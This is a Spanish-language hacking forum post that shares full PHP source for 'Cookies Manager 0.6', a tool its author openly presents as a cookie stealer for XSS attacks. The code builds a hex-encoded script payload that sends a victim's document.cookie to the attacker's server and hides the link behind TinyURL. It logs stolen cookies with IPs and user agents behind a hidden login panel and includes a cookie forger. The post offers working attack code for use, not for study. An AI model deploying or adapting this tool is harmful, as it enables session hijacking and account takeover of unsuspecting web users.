Abril 21, 2018, 05:37:47 am

Autor Tema: [PHP] Cookies Manager 0.6  (Leído 1715 veces)

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado BigBear

  • Yo vivo en CPH
  • ***
  • Mensajes: 736
  • Sexo: Masculino
    • Ver Perfil
[PHP] Cookies Manager 0.6
« en: Diciembre 18, 2015, 02:41:44 pm »
Hoy les traigo una version mejorada de este cookie stealer que les permite capturar,guardar y generar cookies para el robo de cookies usando XSS.

Tiene las siguientes opciones :

  • Cookie Stealer con generador de TinyURL
  • Pueden ver los cookies que les devuelve una pagina
  • Pueden crear cookies con los datos que quieran
  • Panel oculto con login para entrar usen ?poraca para encontrar al login


Una imagen :



Los codigos :

index.php

Código: (php) You are not allowed to view links. Register or Login
<?php

// Cookies Manager 0.6
// (C) Doddy Hackman 2015

// Login

$username "admin"// Edit
$password "21232f297a57a5a743894a0e4a801fc3"// Edit

//

$index "imagen.php"// Edit

if (isset($_GET['poraca'])) {
    
    echo 
'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
      <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
      <title>Login</title>
      <link rel="shortcut icon" href="images/icono.png">
      <link href="style.css" rel="stylesheet" type="text/css" />
   </head>
   <body>
      <center><br>
         <div class="post">
            <h3>Login</h3>
            <div class="post_body">
               <img src="images/login.jpg" width="562" height="440" />
               <br />
               <form action="" method=POST>
                  Username : <input type=text size=30 name=username /><br /><br />
                  Password : <input type=password size=30 name=password /><br /><br />
                  <input type=submit name=login style="width: 100px;" value=Login /><br /><br />
               </form>
            </div>
         </div>
      </center>
   </body>
</html>'
;
    
    if (isset(
$_POST['login'])) {
        
        
$test_username $_POST['username'];
        
$test_password md5($_POST['password']);
        
        if (
$test_username == $username && $test_password == $password) {
            
setcookie("login"base64_encode($test_username "@" $test_password));
            echo 
"<script>alert('Welcome idiot');</script>";
            
$ruta "http://" $_SERVER['HTTP_HOST'] . dirname($_SERVER['PHP_SELF']) . "/" $index;
            echo 
'<meta http-equiv="refresh" content="0; url=' htmlentities($ruta) . '" />';
        } else {
            echo 
"<script>alert('Fuck You');</script>";
        }
    }
    
} else {
    echo 
'<meta http-equiv="refresh" content="0; url=http://www.petardas.com" />';
}

// The End ?

?>


imagen.php

Código: (php) You are not allowed to view links. Register or Login
<?php

// Cookies Manager 0.6
// (C) Doddy Hackman 2015

// Login

$username "admin"// Edit
$password "21232f297a57a5a743894a0e4a801fc3"// Edit 

// DB

$host  "localhost"// Edit
$userw "root"// Edit
$passw ""// Edit
$db    "cookies"// Edit

// Functions

function hex_encode($text)
{
    
$texto chunk_split(bin2hex($text), 2'%');
    return 
$texto '%' substr($texto0strlen($texto) - 1);
}

function 
parsear_cookie($leyendo)
{
    
    
$leyendo   str_replace("comment="""$leyendo);
    
$leyendo   str_replace("Set-Cookie: """$leyendo);
    
$contenido explode(";"$leyendo);
    
    
$nombre       "";
    
$valor_cookie "";
    
$expires      "";
    
$path         "";
    
$domain       "";
    
$secure       "false";
    
$httponly     "false";
    
    foreach (
$contenido as $valor) {
        
        if (
preg_match("/expires=(.*)/"$valor$regex)) {
            
$expires $regex[1];
        }
        
        elseif (
preg_match("/path=(.*)/"$valor$regex)) {
            
$path $regex[1];
        } elseif (
preg_match("/domain=(.*)/"$valor$regex)) {
            
$domain $regex[1];
        } elseif (
preg_match("/secure=(.*)/"$valor$regex)) {
            
$secure $regex[1];
        } elseif (
preg_match("/httponly=(.*)/"$valor$regex)) {
            
$httponly $regex[1];
        }
        
        else {
            
            if (
preg_match("/(.*)=(.*)/"$valor$regex)) {
                
$nombre       $regex[1];
                
$valor_cookie $regex[2];
            }
            
        }
        
    }
    
    return array(
        
$nombre,
        
$valor_cookie,
        
$expires,
        
$path,
        
$domain,
        
$secure,
        
$httponly
    
);
    
}

function 
ver_cookies_de_pagina($pagina)
{
    
$cookies "";
    if (!
function_exists('curl_exec')) {
        
$options = array(
            
'http' => array(
                
'user_agent' => 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0'
            
)
        );
        
$context stream_context_create($options);
        
file_get_contents($pagina);
        foreach (
$http_response_header as $valores) {
            if (
preg_match("/Set-Cookie/"$valores)) {
                
$valores str_replace("Set-Cookie:"""$valores);
                
$cookies $cookies trim($valores) . "\n";
            }
        }
    } else {
        
$nave curl_init($pagina);
        
curl_setopt($naveCURLOPT_TIMEOUT5);
        
curl_setopt($naveCURLOPT_RETURNTRANSFER1);
        
curl_setopt($naveCURLOPT_USERAGENT"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0");
        
curl_setopt($naveCURLOPT_HEADER1);
        
curl_setopt($naveCURLOPT_NOBODY1);
        
$contenido curl_exec($nave);
        
curl_close($nave);
        
$leyendo explode("\n"trim($contenido));
        
        foreach (
$leyendo as $valores) {
            if (
preg_match("/Set-Cookie/"$valores)) {
                
$valores str_replace("Set-Cookie:"""$valores);
                
$cookies $cookies trim($valores) . "\n";
            }
        }
    }
    return 
$cookies;
}

function 
toma($target)
{
    
$code "";
    if (
function_exists('curl_exec')) {
        
$nave curl_init($target);
        
curl_setopt($naveCURLOPT_USERAGENT'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0');
        
curl_setopt($naveCURLOPT_TIMEOUT5);
        
curl_setopt($naveCURLOPT_RETURNTRANSFERtrue);
        
$code curl_exec($nave);
    } else {
        
$options = array(
            
'http' => array(
                
'user_agent' => 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0'
            
)
        );
        
$context stream_context_create($options);
        
$code    file_get_contents($target);
    }
    return 
$code;
}

//

error_reporting(0);

mysql_connect($host$userw$passw);
mysql_select_db($db);

if (isset(
$_GET['id'])) {
    
    if (empty(
$_GET['id'])) {
        
error();
    }
    
    
$dia mysql_real_escape_string(date("d.m.Y"));
    
$ip  mysql_real_escape_string($_SERVER["REMOTE_ADDR"]);
    
    if (
$ip == "::1") {
        
$ip "127.0.0.1";
    }
    
    
$info mysql_real_escape_string($_SERVER["HTTP_USER_AGENT"]);
    
$ref  mysql_real_escape_string($_SERVER["HTTP_REFERER"]);
    
    
$cookie mysql_real_escape_string($_GET['id']);
    
    
mysql_query("INSERT INTO cookies_found(id,fecha,ip,info,cookie) values(NULL,'$dia','$ip','$info','$cookie')");
    
    
header("Location:http://www.google.com.ar");
    
}

elseif (isset(
$_COOKIE['login'])) {
    
    
$st base64_decode($_COOKIE['login']);
    
    
$plit explode("@"$st);
    
$user $plit[0];
    
$pass $plit[1];
    
    if (
$user == $username and $pass == $password) {
        
        echo 
'
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
      <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
      <title>Cookies Manager 0.6</title>
      <link href="style.css" rel="stylesheet" type="text/css" />
      <link rel="shortcut icon" href="images/icono.png">
   </head>
   <body>
   <center>'
;
        
        echo 
'<br><img src="images/cookies.png" /><br>';
        
        if (isset(
$_POST['makecookies'])) {
            
            if (
setcookie($_POST['name_cookie'], $_POST['value_cookie'], time() + 7200$_POST['path_cookie'], $_POST['domain_cookie'])) {
                echo 
"<script>alert('Cookie maked');</script>";
            } else {
                echo 
"<script>alert('Error making Cookie');</script>";
            }
        }
        
        
$edit_name       "";
        
$edit_value      "";
        
$edit_expire     "";
        
$edit_path       "";
        
$edit_domain     "";
        
$edit_secure     "";
        
$edit_httponline "";
        
        if (isset(
$_POST['instalar'])) {
            
            
$cookies_found "create table cookies_found (
id int(10) UNSIGNED NOT NULL AUTO_INCREMENT,
fecha TEXT NOT NULL,
ip TEXT NOT NULL,
info TEXT NOT NULL,
cookie TEXT NOT NULL,
PRIMARY KEY (id));
"
;
            
            if (
mysql_query($cookies_found)) {
                echo 
"<script>alert('Installed');</script>";
            } else {
                echo 
"<script>alert('Error');</script>";
            }
        }
        
        if (
mysql_num_rows(mysql_query("show tables like 'cookies_found'"))) {
            
            
//
            
            
if (isset($_GET['del'])) {
                if (
is_numeric($_GET['del'])) {
                    if (@
mysql_query("delete from cookies_found where id='" $_GET['del'] . "'")) {
                        echo 
"<script>alert('Cookie deleted');</script>";
                    } else {
                        echo 
"<script>alert('Error');</script>";
                    }
                }
            }
            
            
// Cookies Found
            
            
            
$re  mysql_query("select * from cookies_found order by id ASC");
            
$con mysql_num_rows($re);
            echo 
'
            <div class="post">
                <h3>Cookies Found : ' 
$con '</h3>
                   <div class="post_body"><br>'
;
            
            if (
$con <= 0) {
                echo 
'<b>No cookies found</b><br>';
            } else {
                
                echo 
'<table>';
                echo 
"<td><b>ID</b></td><td><b>Date</b></td><td><b>IP</b></td><td><b>Data</b></td><td><b>Cookie</b></td><td><b>Name</b></td><td><b>Value</b></td><td><b>Option</b></td><tr>";
                
                while (
$ver mysql_fetch_array($re)) {
                    
$cookies_view $ver[4];
                    list(
$nombre$valor_cookie$expires$path$domain$secure$httponly) = parsear_cookie($cookies_view);
                    
                    echo 
"<td>" htmlentities($ver[0]) . "</td><td>" htmlentities($ver[1]) . "</td><td>" htmlentities($ver[2]) . "</td><td>" htmlentities($ver[3]) . "</td>";
                    echo 
"<td>" htmlentities($cookies_view) . "</td><td>" htmlentities($nombre) . "</td><td>" htmlentities($valor_cookie) . "</td><td><a href=?del=" htmlentities($ver[0]) . ">Delete</a></td><tr>";
                    
                }
                echo 
"</table>";
                
            }
            
            echo 
'               <br></div>
            </div>'
;
            
            
//
            
            // Form para target
            
            
echo '
            <div class="post">
                <h3>Enter Target</h3>
                   <div class="post_body"><br>'
;
            
            echo 
"
<form action='' method=POST>
<b>Link : </b><input type=text size=40 name=target value='http://localhost/dhlabs/xss/index.php?msg='=></td><tr>
<input type=submit name=getcookies style='height: 25px; width: 100px' value='Get Cookies'> <input type=submit name=generateurl style='height: 25px; width: 100px' value=Generate URL></td>
</form>
 
"
;
            
            echo 
'               <br></div>
            </div>'
;
            
            
// URLS
            
            
if (isset($_POST['generateurl'])) {
                
                echo 
'
            <div class="post">
                <h3>Console</h3>
                   <div class="post_body"><br>'
;
                
                echo 
"<textarea cols=50 name=code readonly>\n";
                
$script         hex_encode("<script>document.location='http://" $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF'] . "?id='+document.cookie;</script>");
                
//echo "http://tinyurl.com/api-create.php?url=".$_POST['target'].$script."\n";
                
$resultado_code toma("http://tinyurl.com/api-create.php?url=" $_POST['target'] . $script);
                echo 
htmlentities($resultado_code);
                echo 
"\n</textarea></table>";
                
                echo 
'               <br><br></div>
            </div>'
;
                
            }
            
//
            
            // Get Cookies
            
            
if (isset($_POST['getcookies'])) {
                
                echo 
'
            <div class="post">
                <h3>Console</h3>
                   <div class="post_body"><br>'
;
                
                echo 
"<textarea cols=50 rows=10 name=code readonly>\n";
                
$resultado_code ver_cookies_de_pagina($_POST['target']);
                echo 
htmlentities($resultado_code);
                echo 
"\n</textarea>";
                
                echo 
'               <br><br></div>
            </div>'
;
                
                
$leyendo_esto split("\n"$resultado_code);
                
                list(
$nombre$valor_cookie$expires$path$domain$secure$httponly) = parsear_cookie($leyendo_esto[0]);
                
                
$edit_name       $nombre;
                
$edit_value      $valor_cookie;
                
$edit_expire     $expires;
                
$edit_path       $path;
                
$edit_domain     $domain;
                
$edit_secure     $secure;
                
$edit_httponline $httponly;
                
            }
            
            
//
            
            // Form para crear cookies
            
            
            
echo '
            <div class="post">
                <h3>Cookie Maker</h3>
                   <div class="post_body"><br>'
;
            
            echo 
"
<form action='' method=POST>
<b>Name : </b><input type=text size=50 name=name_cookie value='
$edit_name'><br><br>
<b>Value : </b><input type=text size=50 name=value_cookie value='
$edit_value'><br><br>
<b>Expires : </b><input type=text size=50 name=expire_cookie value='
$edit_expire'><br><br>
<b>Path : </b><input type=text size=50 name=path_cookie value='
$edit_path'><br><br>
<b>Domain : </b><input type=text size=50 name=domain_cookie value='
$edit_domain'><br><br>
<b>Secure : </b><input type=text size=50 name=secure_cookie value='
$edit_secure'><br><br>
<b>HTTP Online : </b><input type=text size=50 name=httponline_cookie value='
$edit_httponline'><br><br>
<input type=submit name=makecookies style='height: 25px; width: 200px' value='Make Cookie'>
</form>"
;
            
            echo 
'                <br></div>
            </div>'
;
            
        } else {
            
            echo 
'
            <div class="post">
                <h3>Installer</h3>
                   <div class="post_body">'
;
            echo 
"
<form action='' method=POST>
<h2>Do you want install Cookies Manager ?</h2><br>
<input type=submit name=instalar value=Install>
</form><br>"
;
            
            echo 
'                </div>
            </div>'
;
        }
        
        echo 
'  
        <br><h3>(C) Doddy Hackman 2015</h3><br>
        </center>
        </body>
</html>'
;
        
    } else {
        echo 
"<script>alert('Fuck You');</script>";
    }
} else {
    echo 
'<meta http-equiv="refresh" content="0; url=http://www.petardas.com" />';
}

// The End ?

?>


style.css

Código: (css) You are not allowed to view links. Register or Login
/*

==-----------------------------------==
|| Name : DH Theme                   ||
|| Version : 0.8                     || 
|| Author : Doddy H                  ||
|| Description: Templante            ||
|| Date : 14/1/2015                  ||
==-----------------------------------==

*/

body {
background:transparent url("images/fondo.jpg") repeat scroll 0 0;
color:gray;
font-family:helvetica,arial,sans-serif;
font-size:14px;
text-align:center;
}

a:link {
text-decoration:none;
color:orange;
}
a:visited {
color:orange;
}
a:hover {
color:orange;
}

td,tr {
border-style:solid;
border-color: gray;
border-width: 1px;
background: black;
border: solid #222 2px;
color:gray;
font-family:helvetica,arial,sans-serif;
font-size:14px;
text-align:center;
}

textarea {
font: normal 10px Verdana, Arial, Helvetica,sans-serif;
background-color:black;
color:gray;
border: solid #222 2px;
border-color:gray
}

input {
border-style:solid;
border-color: gray;
border-width: 1px;
background: black;
border: solid #222 2px;
color:gray;
font-family:helvetica,arial,sans-serif;
font-size:14px;
}

.post {
background-color:black;
color:gray;
margin-bottom:10px;
width:600px;
word-wrap: break-word;
}

.post h3 {
background-color:black;
color:orange;
background-color:#000;
border: solid #222 2px;
-webkit-border-radius: 4px;
-moz-border-radius: 4px;
border-radius: 4px;
padding:5px 10px;
}

.post_body {
background-color:black;
margin:-20px 0 0 0;
color:white;
background-color:#000;
border: solid #222 2px;
-webkit-border-radius: 4px;
-moz-border-radius: 4px;
border-radius: 4px;
padding:5px 10px;
}

/* The End ? */

Un video con ejemplo de usos :

You are not allowed to view links. Register or Login

Si quieren bajar el programa lo pueden hacer de aca :

You are not allowed to view links. Register or Login.
You are not allowed to view links. Register or Login.


question
Alguna forma de renovar cookies... autologin por cookies... algo por el estilo!

Iniciado por Gatech

0 Respuestas
2306 Vistas
Último mensaje Agosto 04, 2008, 01:41:22 pm
por Gatech
xx
far manager

Iniciado por mr/popeye

0 Respuestas
963 Vistas
Último mensaje Octubre 20, 2007, 08:16:53 am
por mr/popeye
exclamation
[C] Manager

Iniciado por BigBear

2 Respuestas
1053 Vistas
Último mensaje Enero 16, 2012, 09:25:16 am
por BigBear
xx
Access Manager 2.1.58

Iniciado por WaesWaes

0 Respuestas
2011 Vistas
Último mensaje Noviembre 23, 2007, 01:50:47 pm
por WaesWaes
exclamation
[Perl] Manager 0.3

Iniciado por BigBear

0 Respuestas
613 Vistas
Último mensaje Enero 19, 2012, 01:22:01 pm
por BigBear
exclamation
[Delphi] FTP Manager 1.0

Iniciado por BigBear

0 Respuestas
699 Vistas
Último mensaje Agosto 05, 2016, 08:01:14 pm
por BigBear
exclamation
[Perl] Manager

Iniciado por BigBear

0 Respuestas
877 Vistas
Último mensaje Enero 18, 2011, 01:56:38 pm
por BigBear
exclamation
[Python] FTP Manager

Iniciado por BigBear

0 Respuestas
916 Vistas
Último mensaje Febrero 01, 2011, 06:14:58 pm
por BigBear
exclamation
[Perl Tk] FTP Manager 0.2

Iniciado por BigBear

0 Respuestas
853 Vistas
Último mensaje Abril 21, 2012, 09:10:14 pm
por BigBear
exclamation
[Perl] USB Manager 0.2

Iniciado por BigBear

0 Respuestas
683 Vistas
Último mensaje Diciembre 01, 2011, 02:30:51 pm
por BigBear